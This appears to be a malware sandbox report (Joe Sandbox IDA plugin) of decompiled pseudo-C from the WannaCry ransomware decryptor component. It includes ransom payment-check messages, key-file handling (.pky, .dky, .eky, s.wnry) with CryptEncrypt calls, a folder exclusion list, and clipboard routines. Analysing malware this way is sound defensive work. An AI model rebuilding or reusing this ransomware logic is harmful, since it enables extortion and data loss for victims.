                                  					_v244 = _t206;
                                  					_v248 = _v124;
                                  					_v252 = _v128;
                                  				} else {
                                  					 *((intOrPtr*)(_v132 + 0x58))( &_v224);
                                  					asm("sbb eax, eax");
                                  					_push(CreateCompatibleDC( ~( &_v136) & _v132));
                                  					L00412E4E();
                                  					E00409E70( &_v252,  &_v144, _v228 - _v236, _v224 - _v232);
                                  					_t35 =  &_v264; // 0x41675c
                                  					_v260 = E00409F10( &_v280, _t35);
                                  					_push(_v248);
                                  					_push(_v252);
                                  					_push( &_v76);
                                  					L00412FF8();
                                  				}
                                  				_v16 = 3;
                                  				_v204 =  &_v256;
                                  				_t148 =  *((intOrPtr*)(_t281 + 0x5c));
                                  				_t291 = _t148;
                                  				if(_t291 == 0) {
                                  					_push( *((intOrPtr*)(_t281 + 0x58)));
                                  					_push( &_v196);
                                  					L00412FF2();
                                  				} else {
                                  					if(_t291 != 0) {
                                  						_t182 =  *(_t148 + 4);
                                  					} else {
                                  						_t182 = 0;
                                  					}
                                  					FillRect(_v252,  &_v196, _t182);
                                  				}
                                  				_push(_t281 + 0x74);
                                  				L00412FEC();
                                  				_t150 = _v196.top;
                                  				if(_t150 < _v196.right.left || _t150 > _v196.bottom) {
                                  					_v268 = 0x4166e0;
                                  					_v28 = 5;
                                  					if(_v220 == 0) {
                                  						_v260 = 0;
                                  						_v264 = 0;
                                  					} else {
                                  						_t153 = _v232;
                                  						E00409F80(_v240, _v236, _v232, _v228 - _v236, _v224 - _v232,  &_v268, _v236, _t153, 0xcc0020);
                                  						_t155 = _v276;
                                  						if(_t155 != 0) {
                                  							_push( *((intOrPtr*)(_t155 + 4)));
                                  							_push(_v264);
                                  							L00412E48();
                                  						} else {
                                  							_push(0);
                                  							_push(_v264);
                                  							L00412E48();
                                  						}
                                  					}
                                  					_v28 = 4;
                                  				} else {
                                  					L00412FE6();
                                  					_v212 = _t150;
                                  					_t276 = _t150 & 0x00008000;
                                  					_v148 = _t150 & 0x00002000;
                                  					_v180 = 0;
                                  					_v176 = 0;
                                  					_v168 = 0;
                                  					_v164 = 0;
                                  					_v160 = 0;
                                  					_v152 = 0;
                                  					if((_t150 & 0x00000004) == 0) {
                                  						_v156 = _v200 - _v208;
                                  					} else {
                                  						_v156 = _v196.left - _v204;
                                  					}
                                  					asm("fild dword [esp+0x80]");
                                  					_push(_t283);
                                  					_t284 = _v196.right.left;
                                  					_t163 = _v196.top - _t284;
                                  					_v272 = _v196.bottom - _t284;
                                  					asm("fild dword [esp+0x10]");
                                  					_v272 = _t163;
                                  					asm("fild dword [esp+0x10]");
                                  					_t301 = _t299 * st2 / st1;
                                  					L0041304A();
                                  					_v172 = _t163;
                                  					if(_t276 == 0) {
                                  						st0 = _t301;
                                  						st0 = _t301;
                                  					} else {
                                  						_v272 =  *((intOrPtr*)(_t281 + 0x68)) - _t284;
                                  						asm("fild dword [esp+0x10]");
                                  						_t303 = _t301 * st2 / st1;
                                  						L0041304A();
                                  						st0 = _t303;
                                  						st0 = _t303;
                                  						_v180 = _t163;
                                  					}
                                  					_t277 =  *((intOrPtr*)(_t281 + 0x54));
                                  					if(_t277 == 0) {
                                  						_t165 =  &_v180;
                                  						if(_v148 == 0) {
                                  							_t165 =  &_v164;
                                  						}
                                  						 *((intOrPtr*)( *_t281 + 0xc0))( &_v216, _t165,  &_v180);
                                  					} else {
                                  						_t177 = E00409D40( &_v52,  &_v216,  &_v180);
                                  						if(_t277 != 0) {
                                  							FillRect(_v264, _t177,  *(_t277 + 4));
                                  						} else {
                                  							FillRect(_v264, _t177, 0);
                                  						}
                                  					}
                                  					 *((intOrPtr*)( *_t281 + 0xc8))( &_v228,  &_v176,  &(_v196.top));
                                  					_v292 = 0x4166e0;
                                  					_v52 = 7;
                                  					if(_v244 == 0) {
                                  						_v284 = 0;
                                  						_v288 = 0;
                                  						_v52 = 6;
                                  					} else {
                                  						_t172 = _v256;
                                  						E00409F80(_v264, _v260, _v256, _v252 - _v260, _v248 - _v256,  &_v292, _v260, _t172, 0xcc0020);
                                  						_t112 =  &_v324; // 0x4166e0
                                  						E00409F10(_t112, _v300);
                                  						_v88 = 6;
                                  					}
                                  				}
                                  				_t133 =  &_v252; // 0x41675c
                                  				_t152 = E00409E20(_t133);
                                  				_v28 = 0;
                                  				L00412E3C();
                                  				_v28 = 0xffffffff;
                                  				L00412DB8();
                                  				 *[fs:0x0] = _v36;
                                  				return _t152;
                                  			}

                                  APIs
                                  • #470.MFC42 ref: 00408708
                                  • GetClientRect.USER32(?,?), ref: 0040871F
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00408730
                                  • #6734.MFC42(?,?), ref: 00408746
                                  • #323.MFC42(?,?), ref: 0040874F
                                  • CreateCompatibleDC.GDI32(?), ref: 004087D2
                                  • #1640.MFC42(00000000), ref: 004087DD
                                    • Part of subcall function 00409E70: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409E85
                                    • Part of subcall function 00409E70: #1641.MFC42(00000000,?,00408809,?,?,?,00000000), ref: 00409E8E
                                    • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F1D
                                  • #6194.MFC42(?,?,?,\gA,?,?,?,00000000), ref: 00408831
                                  • FillRect.USER32(?,?,?), ref: 0040887D
                                  • #2754.MFC42(?,?), ref: 00408892
                                  • #2381.MFC42(?,?,?), ref: 0040889F
                                  • #3797.MFC42(?,?,?), ref: 004088C0
                                  • _ftol.MSVCRT ref: 00408951
                                  • _ftol.MSVCRT ref: 0040896F
                                  • FillRect.USER32(?,00000000,00000000), ref: 004089B0
                                  • #640.MFC42(?,?,?), ref: 00408B09
                                  • #755.MFC42(?,?,?), ref: 00408B20
                                    • Part of subcall function 00409F80: BitBlt.GDI32(?,?,?,?,\gA,?,\gA,\gA,\gA), ref: 00409FB3
                                    • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F2D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Rect$#5785CompatibleCreateFill_ftol$#1640#1641#2381#2754#323#3797#470#6194#640#6734#755BitmapClientMessageSend
                                  • String ID: \gA$fA$fA
                                  • API String ID: 1027735583-2217880857
                                  • Opcode ID: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
                                  • Instruction ID: b72dd9534e9f1d52b621f8c4883ea919de29669ae4f9aefa89eb3b477b52946b
                                  • Opcode Fuzzy Hash: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
                                  • Instruction Fuzzy Hash: 33D12CB16083419FC314DF25C984AAFBBE9BBC8304F508E2EF1D993291DB749949CB56
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _wcsicmp$_wcsnicmpwcsstr
                                  • String ID: This folder protects against ransomware. Modifying it will reduce protection$Content.IE5$N(@$Temporary Internet Files$\AppData\Local\Temp$\Intel$\Local Settings\Temp$\Program Files$\Program Files (x86)$\ProgramData$\WINDOWS
                                  • API String ID: 2817753184-2613825984
                                  • Opcode ID: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                  • Instruction ID: 690a6d88e0cbcba8c0a0bc490ea4abea364cf6131422823267360e98b5ddcfca
                                  • Opcode Fuzzy Hash: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                  • Instruction Fuzzy Hash: 3831843235162023D520691D7D4AFCB638C8FE5727F554033FD44E52C1E29EB96A82BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			E00401760(void* __ecx) {
                                  				int _v8;
                                  				intOrPtr _v12;
                                  				char _v20;
                                  				struct _IO_FILE* _v32;
                                  				void _v2059;
                                  				void _v2060;
                                  				void _v2571;
                                  				void _v2572;
                                  				char _v2576;
                                  				char _v2604;
                                  				void* _v2608;
                                  				char _v2616;
                                  				void* _v2636;
                                  				void* _v2640;
                                  				void* _t36;
                                  				struct _IO_FILE* _t37;
                                  				signed int _t38;
                                  				unsigned int _t45;
                                  				signed int _t49;
                                  				void* _t50;
                                  				signed int _t67;
                                  				struct _IO_FILE* _t87;
                                  				void* _t94;
                                  				void* _t97;
                                  				intOrPtr _t98;
                                  				void* _t99;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004134C6);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t98;
                                  				_t99 = _t98 - 0xa28;
                                  				_t94 = __ecx;
                                  				L00412CD4();
                                  				_t36 =  *(__ecx + 0xac);
                                  				if(_t36 != 0) {
                                  					WaitForSingleObject(_t36, 0xbb8);
                                  					TerminateThread( *(_t94 + 0xac), 0);
                                  					CloseHandle( *(_t94 + 0xac));
                                  				}
                                  				_t37 = E0040C670();
                                  				if( *((intOrPtr*)(_t94 + 0xb4)) != 0) {
                                  					L15:
                                  					 *[fs:0x0] = _v12;
                                  					return _t37;
                                  				} else {
                                  					_t37 =  *(_t94 + 0xa8);
                                  					if(_t37 != 1) {
                                  						if(_t37 != 0xffffffff) {
                                  							if(_t37 != 2) {
                                  								goto L15;
                                  							}
                                  							_push(0);
                                  							_push(0x40);
                                  							_push("Congratulations! Your payment has been checked!\nStart decrypting now!");
                                  							L14:
                                  							L00412CC8();
                                  							goto L15;
                                  						}
                                  						if( *((intOrPtr*)(_t94 + 0xa0)) == 0) {
                                  							L11:
                                  							_push(0);
                                  							_push(0xf0);
                                  							_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
                                  							goto L14;
                                  						}
                                  						_t38 = rand();
                                  						asm("cdq");
                                  						_t37 = _t38 / 3;
                                  						if(_t38 % 3 != 0) {
                                  							goto L11;
                                  						}
                                  						_push(0);
                                  						_push(0x30);
                                  						_push("Failed to check your payment!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
                                  						goto L14;
                                  					}
                                  					_v2572 = 0;
                                  					memset( &_v2571, 0, 0x7f << 2);
                                  					asm("stosw");
                                  					asm("stosb");
                                  					_v2060 = 0;
                                  					memset( &_v2059, 0, 0x1ff << 2);
                                  					asm("stosw");
                                  					asm("stosb");
                                  					sprintf( &_v2604, "%08X.dky", 0);
                                  					_t37 = fopen( &_v2604, "rb");
                                  					_t87 = _t37;
                                  					_t99 = _t99 + 0x2c;
                                  					if(_t87 == 0) {
                                  						_push(0);
                                  						_push(0xf0);
                                  						_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
                                  						L00412CC8();
                                  						 *(_t94 + 0xa8) = 0xffffffff;
                                  					} else {
                                  						_t45 = fread( &_v2060, 1, 0x800, _t87);
                                  						fclose(_t87);
                                  						DeleteFileA( &_v2604);
                                  						_t97 =  &_v2060;
                                  						_t67 = _t45 >> 2;
                                  						_t49 = memcpy( &_v2572, _t97, _t67 << 2);
                                  						_push("You have a new message:\n");
                                  						_t50 = memcpy(_t97 + _t67 + _t67, _t97, _t49 & 0x00000003);
                                  						_t99 = _t99 + 0x2c;
                                  						L00412CAA();
                                  						_push( &_v2576);
                                  						_push(_t50);
                                  						_push( &_v2616);
                                  						_v8 = 0;
                                  						L00412CCE();
                                  						_t37 =  *_t50;
                                  						_push(0);
                                  						_push(0x40);
                                  						_push(_t37);
                                  						_v20 = 1;
                                  						L00412CC8();
                                  						_v32 = 0;
                                  						L00412CC2();
                                  						_v32 = 0xffffffff;
                                  						L00412CC2();
                                  					}
                                  					goto L15;
                                  				}
                                  			}

                                  APIs
                                  • #6453.MFC42 ref: 00401780
                                  • WaitForSingleObject.KERNEL32(?,00000BB8), ref: 00401797
                                  • TerminateThread.KERNEL32(?,00000000), ref: 004017A5
                                  • CloseHandle.KERNEL32(?), ref: 004017B2
                                  • sprintf.MSVCRT ref: 00401811
                                  • fopen.MSVCRT ref: 00401821
                                  • fread.MSVCRT ref: 00401844
                                  • fclose.MSVCRT ref: 0040184D
                                  • DeleteFileA.KERNEL32(?), ref: 0040185B
                                  • #537.MFC42(You have a new message:), ref: 00401885
                                  • #924.MFC42(?,00000000,?,You have a new message:), ref: 0040189C
                                  • #1200.MFC42 ref: 004018AF
                                  • #800.MFC42 ref: 004018BF
                                  • #800.MFC42 ref: 004018D3
                                  • #1200.MFC42(You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.,000000F0,00000000), ref: 004018E5
                                  Strings
                                  • You have a new message:, xrefs: 00401877
                                  • %08X.dky, xrefs: 0040180A
                                  • You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday., xrefs: 004018E0, 00401925
                                  • Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 00401918
                                  • Congratulations! Your payment has been checked!Start decrypting now!, xrefs: 00401934
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1200#800$#537#6453#924CloseDeleteFileHandleObjectSingleTerminateThreadWaitfclosefopenfreadsprintf
                                  • String ID: %08X.dky$Congratulations! Your payment has been checked!Start decrypting now!$Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.$You have a new message:
                                  • API String ID: 2207195628-1375496427
                                  • Opcode ID: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                  • Instruction ID: 8b94a0d45af64711c1f2f56a46f7a966efbefe6460f93d7d0814001cf74dce0a
                                  • Opcode Fuzzy Hash: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                  • Instruction Fuzzy Hash: 1D41F371244740EFC330DB64C895BEB7699AB85710F404A3EF25AA32E0DABC5944CB6B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E004012E0(void* __ecx) {
                                  				int _v4;
                                  				intOrPtr _v12;
                                  				void _v2059;
                                  				void _v2060;
                                  				void _v2192;
                                  				void _v2196;
                                  				intOrPtr _v2324;
                                  				void _v2328;
                                  				void _v2332;
                                  				char _v2364;
                                  				char _v2396;
                                  				char _v2436;
                                  				char _v2468;
                                  				char _v2508;
                                  				char _v2540;
                                  				intOrPtr _t61;
                                  				long _t65;
                                  				struct _IO_FILE* _t83;
                                  				int _t85;
                                  				intOrPtr _t88;
                                  				struct _IO_FILE* _t91;
                                  				int _t97;
                                  				void* _t100;
                                  				char* _t123;
                                  				void _t131;
                                  				struct _IO_FILE* _t143;
                                  				struct _IO_FILE* _t146;
                                  				struct _IO_FILE* _t149;
                                  				void* _t154;
                                  				signed int _t156;
                                  				signed int _t157;
                                  				intOrPtr _t161;
                                  				void* _t164;
                                  				void* _t166;
                                  				void* _t169;
                                  				void* _t172;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004134A6);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t161;
                                  				_t61 =  *0x42189c; // 0x0
                                  				_push(_t156);
                                  				_t154 = __ecx;
                                  				_t3 = _t61 + 0x50c; // 0x50c
                                  				_t100 = _t3;
                                  				sprintf( &_v2468, "%08X.pky",  *((intOrPtr*)(__ecx + 0xa4)));
                                  				sprintf( &_v2540, "%08X.dky",  *((intOrPtr*)(_t154 + 0xa4)));
                                  				_t164 = _t161 - 0x9e0 + 0x18;
                                  				_t65 = GetFileAttributesA( &_v2540);
                                  				_t157 = _t156 | 0xffffffff;
                                  				if(_t65 == _t157) {
                                  					L4:
                                  					_v2196 = 0;
                                  					memset( &_v2192, 0, 0x21 << 2);
                                  					_t143 = fopen("00000000.res", "rb");
                                  					_t166 = _t164 + 0x14;
                                  					__eflags = _t143;
                                  					if(_t143 != 0) {
                                  						fread( &_v2196, 0x88, 1, _t143);
                                  						fclose(_t143);
                                  						_v2332 = 0;
                                  						memset( &_v2328, 0, 0x21 << 2);
                                  						sprintf( &_v2364, "%08X.res",  *((intOrPtr*)(_t154 + 0xa4)));
                                  						_t146 = fopen( &_v2364, "rb");
                                  						_t169 = _t166 + 0x34;
                                  						__eflags = _t146;
                                  						if(_t146 != 0) {
                                  							fread( &_v2332, 0x88, 1, _t146);
                                  							fclose(_t146);
                                  							_t131 =  *0x421798; // 0x0
                                  							_v2060 = _t131;
                                  							memset( &_v2059, 0, 0x1ff << 2);
                                  							asm("stosw");
                                  							asm("stosb");
                                  							sprintf( &_v2396, "%08X.eky",  *((intOrPtr*)(_t154 + 0xa4)));
                                  							_t83 = fopen( &_v2396, "rb");
                                  							_t149 = _t83;
                                  							_t172 = _t169 + 0x34;
                                  							__eflags = _t149;
                                  							if(_t149 != 0) {
                                  								_t85 = fread( &_v2060, 1, 0x800, _t149);
                                  								fclose(_t149);
                                  								_t39 = _t100 + 0x242; // 0x74e
                                  								_t40 = _t100 + 0x1de; // 0x6ea
                                  								E0040BE90("s.wnry", _t40, _t39);
                                  								_t88 =  *0x42189c; // 0x0
                                  								_push( *((intOrPtr*)(_t154 + 0x20)));
                                  								_push( &_v2540);
                                  								_push( *((intOrPtr*)(_t88 + 0x818)));
                                  								_push( *((intOrPtr*)(_t88 + 0x81c)));
                                  								_t46 = _t100 + 0xb2; // 0x5be
                                  								_push(_t85);
                                  								_push( &_v2060);
                                  								_push(_v2324);
                                  								_push( &_v2332);
                                  								_push( &_v2196);
                                  								_push(_t100 + 0xe4);
                                  								_t91 = E0040C240( &_v2332, __eflags);
                                  								_t172 = _t172 + 0x4c;
                                  								_t83 = E0040C670();
                                  								__eflags = _t91;
                                  								if(_t91 >= 0) {
                                  									E00404640( &_v2436);
                                  									_v4 = 1;
                                  									_t94 = E004047C0( &_v2436,  &_v2468,  &_v2540);
                                  									__eflags = _t94;
                                  									if(_t94 == 0) {
                                  										 *(_t154 + 0xa8) = 1;
                                  									} else {
                                  										 *(_t154 + 0xa8) = 2;
                                  									}
                                  									_v4 = 0xffffffff;
                                  									_t123 =  &_v2436;
                                  									goto L15;
                                  								}
                                  							} else {
                                  								 *(_t154 + 0xa8) = 0xffffffff;
                                  							}
                                  						} else {
                                  							 *(_t154 + 0xa8) = 0xffffffff;
                                  						}
                                  					} else {
                                  						 *(_t154 + 0xa8) = _t157;
                                  					}
                                  				} else {
                                  					E00404640( &_v2508);
                                  					_v4 = 0;
                                  					if(E004047C0( &_v2508,  &_v2468,  &_v2540) == 0) {
                                  						_t97 = DeleteFileA( &_v2540);
                                  						_v4 = _t157;
                                  						E00404690(_t97,  &_v2508);
                                  						goto L4;
                                  					} else {
                                  						 *(_t154 + 0xa8) = 2;
                                  						_v4 = _t157;
                                  						_t123 =  &_v2508;
                                  						L15:
                                  						_t83 = E00404690(_t94, _t123);
                                  					}
                                  				}
                                  				 *[fs:0x0] = _v12;
                                  				return _t83;
                                  			}








































                                  APIs
                                  • sprintf.MSVCRT ref: 00401323
                                  • sprintf.MSVCRT ref: 00401339
                                  • GetFileAttributesA.KERNEL32(?), ref: 00401343
                                  • DeleteFileA.KERNEL32(?), ref: 0040139A
                                  • fread.MSVCRT ref: 00401405
                                  • fclose.MSVCRT ref: 00401408
                                  • sprintf.MSVCRT ref: 00401440
                                  • fopen.MSVCRT ref: 00401453
                                    • Part of subcall function 00404690: DeleteCriticalSection.KERNEL32(?,004015D8), ref: 0040469A
                                  • fopen.MSVCRT ref: 004013D5
                                    • Part of subcall function 00404640: InitializeCriticalSection.KERNEL32(?,?,0040158C), ref: 00404658
                                    • Part of subcall function 004047C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
                                    • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 004048EB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: sprintf$CriticalDeleteFileSectionfopen$AttributesCryptEncryptInitialize_local_unwind2fclosefread
                                  • String ID: %08X.dky$%08X.eky$%08X.pky$%08X.res$00000000.res$s.wnry
                                  • API String ID: 2787528210-4016014174
                                  • Opcode ID: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                  • Instruction ID: 5d668cda142e4e69bdcb8de65b1bf6b3866dc1aa9a0cfc7ced8feefa58b75360
                                  • Opcode Fuzzy Hash: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                  • Instruction Fuzzy Hash: 8A71BFB1104741AFD320DB60CC85FEBB3E9ABC4310F404A3EE59A87290EB78A4498B56
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E004035A0(intOrPtr __ecx) {
                                  				int _t51;
                                  				void* _t54;
                                  				long _t55;
                                  				signed int _t64;
                                  				signed int _t68;
                                  				void* _t71;
                                  				int _t78;
                                  				short _t86;
                                  				signed int _t92;
                                  				intOrPtr _t110;
                                  				int _t121;
                                  				void* _t122;
                                  				void* _t123;
                                  				void* _t126;
                                  				void* _t128;
                                  				intOrPtr _t129;
                                  				void* _t130;
                                  				void* _t132;
                                  				void* _t134;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041365C);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t129;
                                  				_t130 = _t129 - 0x2e4;
                                  				_t110 = __ecx;
                                  				 *((intOrPtr*)(_t130 + 0x28)) = __ecx;
                                  				_t51 = SendMessageA( *(__ecx + 0x80), 0x1004, 0, 0);
                                  				if(_t51 != 0) {
                                  					_t51 = OpenClipboard( *(_t110 + 0x20));
                                  					if(_t51 != 0) {
                                  						_t121 = 0;
                                  						_t126 = 0;
                                  						if(SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0) > 0) {
                                  							do {
                                  								_push(0);
                                  								_t71 = _t130 + 0x18;
                                  								_push(_t121);
                                  								_push(_t71);
                                  								L00412D7C();
                                  								_push(0x4206e0);
                                  								_push(_t71);
                                  								_push(_t130 + 0x14);
                                  								 *(_t130 + 0x308) = 0;
                                  								L00412CCE();
                                  								 *(_t130 + 0x2fc) = 2;
                                  								L00412CC2();
                                  								 *(_t130 + 0x2fc) = 0xffffffff;
                                  								_t126 = _t126 +  *( *(_t130 + 0x10) - 8) * 2;
                                  								L00412CC2();
                                  								_t121 = _t121 + 1;
                                  							} while (_t121 < SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0));
                                  						}
                                  						_t122 = GlobalAlloc(2, _t126 + 2);
                                  						 *(_t130 + 0x14) = _t122;
                                  						if(_t122 != 0) {
                                  							_t54 = GlobalLock(_t122);
                                  							 *(_t130 + 0x10) = _t54;
                                  							if(_t54 != 0) {
                                  								_t78 = 0;
                                  								_t128 = 0;
                                  								_t55 = SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0);
                                  								if(_t55 > 0) {
                                  									while(1) {
                                  										_push(0);
                                  										_push(_t78);
                                  										_push(_t130 + 0x24);
                                  										L00412D7C();
                                  										_push(0x4206e0);
                                  										_push(_t55);
                                  										 *((intOrPtr*)(_t130 + 0x304)) = 3;
                                  										_push(_t130 + 0x24);
                                  										L00412CCE();
                                  										 *(_t130 + 0x2fc) = 5;
                                  										L00412CC2();
                                  										_t86 =  *0x42179c; // 0x0
                                  										 *(_t130 + 0x24) = _t86;
                                  										memset(_t130 + 0x26, 0, 0xb3 << 2);
                                  										_t132 = _t130 + 0xc;
                                  										asm("stosw");
                                  										MultiByteToWideChar(0, 0,  *(_t132 + 0x1c), 0xffffffff, _t130 + 0x24, 0x167);
                                  										_t64 = wcslen(_t132 + 0x24);
                                  										_t123 = _t132 + 0x28;
                                  										_t92 = _t64 << 1 >> 2;
                                  										memcpy(_t123 + _t92 + _t92, _t123, memcpy( *((intOrPtr*)(_t132 + 0x14)) + _t128, _t123, _t92 << 2) & 0x00000003);
                                  										_t134 = _t132 + 0x18;
                                  										_t68 = wcslen(_t134 + 0x28);
                                  										_t130 = _t134 + 8;
                                  										_t128 = _t128 + _t68 * 2;
                                  										 *(_t130 + 0x2fc) = 0xffffffff;
                                  										L00412CC2();
                                  										_t78 = _t78 + 1;
                                  										_t55 = SendMessageA( *( *((intOrPtr*)(_t130 + 0x18)) + 0x80), 0x1004, 0, 0);
                                  										if(_t78 >= _t55) {
                                  											break;
                                  										}
                                  										_t110 =  *((intOrPtr*)(_t130 + 0x18));
                                  									}
                                  									_t122 =  *(_t130 + 0x14);
                                  								}
                                  								 *((short*)( *(_t130 + 0x10) + _t128)) = 0;
                                  								GlobalUnlock(_t122);
                                  								EmptyClipboard();
                                  								SetClipboardData(0xd, _t122);
                                  							} else {
                                  								GlobalFree(_t122);
                                  							}
                                  						}
                                  						_t51 = CloseClipboard();
                                  					}
                                  				}
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t130 + 0x2f4));
                                  				return _t51;
                                  			}

                                  APIs
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004035DB
                                  • OpenClipboard.USER32(?), ref: 004035E9
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403609
                                  • #3301.MFC42(?,00000000,00000000), ref: 0040361A
                                  • #924.MFC42 ref: 00403635
                                  • #800.MFC42 ref: 00403646
                                  • #800.MFC42 ref: 00403665
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040367B
                                  • GlobalAlloc.KERNEL32(00000002,-00000002), ref: 00403687
                                  • GlobalLock.KERNEL32(00000000), ref: 0040369C
                                  • GlobalFree.KERNEL32(00000000), ref: 004036AB
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004036C8
                                  • #3301.MFC42(?,00000000,00000000), ref: 004036E7
                                  • #924.MFC42(00000000), ref: 00403702
                                  • #800.MFC42(00000000), ref: 00403713
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000167,00000000), ref: 00403748
                                  • wcslen.MSVCRT ref: 00403753
                                  • wcslen.MSVCRT ref: 0040377B
                                  • #800.MFC42 ref: 00403797
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004037B1
                                  • GlobalUnlock.KERNEL32(00000000), ref: 004037CE
                                  • EmptyClipboard.USER32 ref: 004037D4
                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004037DD
                                  • CloseClipboard.USER32 ref: 004037E3
                                  Memory Dump Source
